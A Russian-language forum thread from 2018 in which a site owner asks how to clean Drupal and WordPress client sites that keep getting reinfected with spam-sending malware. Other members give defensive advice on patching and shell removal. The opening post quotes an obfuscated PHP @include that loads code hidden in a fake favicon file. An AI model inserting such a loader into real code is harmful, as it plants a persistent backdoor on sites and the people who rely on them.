Этот сайт существует на доходы от рекламы.
Пожалуйста, выключите AdBlock.
Вернуться   Форум об интернет-маркетинге > >
Ответ
 
Опции темы
Старый 27.04.2018, 10:27   #1
Коплю деньги
 
Аватар для katenuha
 
Регистрация: 13.06.2013
Сообщений: 338
Репутация: 109341

По умолчанию Взлом сайта

Приветствую. Столкнулся с такой проблемой.
Уже на 2х сайтах, которые никак друг с другом не связаны, нахожу вредоносные вставки и файлы. Сайты клиентские. Т.е приходит сайт в работу (продвижение/доработки, а там уже понапихано всякой дряни)

В чем суть:
на фтп создаются рандомные файлы иногда с названиями вида sdfs.php, иногда index.php в рандомных папках и в хаотичном порядке. Рандомное количество в день. Также добавляются вставки кода в основные файлы движка.
В файле index.php в корне, например, вот такое

PHP код:
/*ea20a*/

@include "\x2fh\x6fm\x65/\x6fk\x6eo\x73t\x72/\x77w\x77/\x73i\x74e\x32/\x70u\x62l\x69c\x5fh\x74m\x6c/\x6do\x64u\x6ce\x73/\x73y\x73t\x65m\x2ft\x65s\x74s\x2ff\x61v\x69c\x6fn\x5f4\x36c\x379\x30.\x69c\x6f";

/*ea20a*/ 
первый сайт на drupal, второй на wordpress.

Айболит не помогает. Им прогоняли, чистили все, что он нашел, на следующий день снова куча файлов и вставок.

С вордпресс проблему решили, поставили чистый движок и перекинули шаблон предварительно его проверив. (из модулей не ставили ничего). С друпалом все сложнее и займет очень много времени установка чистого и настройка модулей и всего сайта.

Кто-нибудь сталкивался? Самая бяка в том, что это все рассылает спам с сервера и некоторые хостеры могут заблочить функцию отправки письма, как было с сайтом на вордпресс (в итоге клиент ушел после полу года работы с отличными результатами из-за того, что не поверил, что вся эта вирусня появилась еще до работы с нами)
Кроме спама иногда на сайте появляется реклама (баннеры) не всплывающие, а между блоками сайта, аккуратно вставленная. После обновления страницы пропадает.

Буду благодарен за любой совет

---------- Добавлено 27.04.2018 в 11:28 ----------

Еще подметил. Если почистить файл от вставки, а на следующий день посмотреть - там снова она есть, но дата изменения файла не менялась.
katenuha вне форума   Ответить с цитированием

Реклама
Старый 27.04.2018, 11:09   #2
SeVlad
Guru-Editor
 
Регистрация: 03.11.2008
Адрес: Donbass
Сообщений: 17,195
Репутация: 1422441

По умолчанию Re: Взлом сайта

Цитата:
Сообщение от katenuha Посмотреть сообщение
первый сайт на drupal, второй на wordpress.
Надо бы указывать версии.
В Друпале за последнее время обнаружено 2 критичных уязвимости. Как минимум одну может заюзать любой начинающий кулцхакер. Фиксы кажется вышли - надо фиксить.

В ВП, если используются темы/плагины с помоек/древние/самописьки, тоже в них могут быть дыры.

Если сайты не изолированы, то дыра на одном позволяет добраться до всех.

Цитата:
Сообщение от katenuha Посмотреть сообщение
Если почистить файл от вставки, а на следующий день посмотреть - там снова она есть, но дата изменения файла не менялась
шелл не удалён, работает.
__________________
Топики помощи с ⓌordPress и основы безопасности сайтов.
*** Помощь\консультации в топиках форума - БЕСПЛАТНО. Через личку - с бюджетом от 50$ ***
SeVlad вне форума   Ответить с цитированием
Сказали спасибо:
Старый 27.04.2018, 11:23   #3
katenuha
Коплю деньги
 
Аватар для katenuha
 
Регистрация: 13.06.2013
Сообщений: 338
Репутация: 109341

ТопикСтартер Re: Взлом сайта

Цитата:
Сообщение от SeVlad Посмотреть сообщение
Надо бы указывать версии.
В Друпале за последнее время обнаружено 2 критичных уязвимости. Как минимум одну может заюзать любой начинающий кулцхакер. Фиксы кажется вышли - надо фиксить.

В ВП, если используются темы/плагины с помоек/древние/самописьки, тоже в них могут быть дыры.

Если сайты не изолированы, то дыра на одном позволяет добраться до всех.


шелл не удалён, работает.
wordpress был последний
друпал 7

плагины особо не юзались на вп кроме all in seo pack

сайты изолированы
katenuha вне форума   Ответить с цитированием
Старый 27.04.2018, 12:11   #4
SeVlad
Guru-Editor
 
Регистрация: 03.11.2008
Адрес: Donbass
Сообщений: 17,195
Репутация: 1422441

По умолчанию Re: Взлом сайта

Цитата:
Сообщение от katenuha Посмотреть сообщение
сайты изолированы
Это вряд ли, если одинаковая зараза на всех.
Цитата:
Сообщение от katenuha Посмотреть сообщение
плагины особо не юзались на вп кроме all in seo pack
Достаточно одной помоешной/древней/самописной темы.
SeVlad вне форума   Ответить с цитированием
Старый 27.04.2018, 12:14   #5
katenuha
Коплю деньги
 
Аватар для katenuha
 
Регистрация: 13.06.2013
Сообщений: 338
Репутация: 109341

ТопикСтартер Re: Взлом сайта

Цитата:
Сообщение от SeVlad Посмотреть сообщение
Это вряд ли, если одинаковая зараза на всех.
ну как вряд ли. Хостинги разные. Один клиент пришел в ноябре еще. Файлы с таким кодом у него были еще с 16 года. Второй клиент пришел в феврале 18 года. Первые файлы с этой фигней датированы июлем 2017.
Цитата:
Сообщение от SeVlad Посмотреть сообщение
Достаточно одной помоешной/древней/самописной темы.
Зараза появилась не при нас. Вопрос что это и как почистить.
katenuha вне форума   Ответить с цитированием
Старый 27.04.2018, 12:15   #6
Апокалипсис
Вылечу недорого.
 
Аватар для Апокалипсис
 
Регистрация: 02.11.2008
Сообщений: 4,592
Репутация: 356333

По умолчанию Re: Взлом сайта

Логи смотрите. Вообще все это только ручками делается. Айболит лишь может намекнуть или найти популярный вирус.
__________________
Проведу аудит интернет-магазина: отказы, конверсии, юзабилити: помогу повысить конверсию и продажи.
Записки нищего - мой личный блог на Дзене
Апокалипсис вне форума   Ответить с цитированием
Сказали спасибо 3 пользователей:
Старый 27.04.2018, 12:25   #7
SeVlad
Guru-Editor
 
Регистрация: 03.11.2008
Адрес: Donbass
Сообщений: 17,195
Репутация: 1422441

По умолчанию Re: Взлом сайта

Цитата:
Сообщение от katenuha Посмотреть сообщение
Хостинги разные.
А, ну если так (из стартоста этого не особо видно), тогда да, изолированы.
Цитата:
Сообщение от katenuha Посмотреть сообщение
Вопрос что это и как почистить.
Тогда разбираться отдельно с каждым сайтом.
1. Пофиксить дыру в друпале (на друпал.орг поищи фикс)
2. Найти-удалить шелл. Айболит в параноидальном режиме в помощь (но это не панацея).

В ВП, если что, можно сравнить файлы ядра с оригинальными с пом плага https://ru.wordpress.org/plugins/health-check/
SeVlad вне форума   Ответить с цитированием
Старый 27.04.2018, 15:38   #9
katenuha
Коплю деньги
 
Аватар для katenuha
 
Регистрация: 13.06.2013
Сообщений: 338
Репутация: 109341

ТопикСтартер Re: Взлом сайта

Цитата:
Сообщение от WebAlt Посмотреть сообщение
https://wpvulndb.com/ - дпя Wordpress
https://www.drupal.org/security - дпя Drupal
спасибо, а что с этим делать?)
katenuha вне форума   Ответить с цитированием
Старый 27.04.2018, 16:06   #10
neoks
Профессор
 
Аватар для neoks
 
Регистрация: 17.03.2010
Сообщений: 755
Репутация: 50045

По умолчанию Re: Взлом сайта

Ставьте логи запросов и смотрите что происходит, сайты будут ломаться пока не закроете дырку.
neoks вне форума   Ответить с цитированием
Сказали спасибо:
Ответ




Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Текущее время: 03:33. Часовой пояс GMT +3.

Регистрация Справка Календарь Поддержка Все разделы прочитаны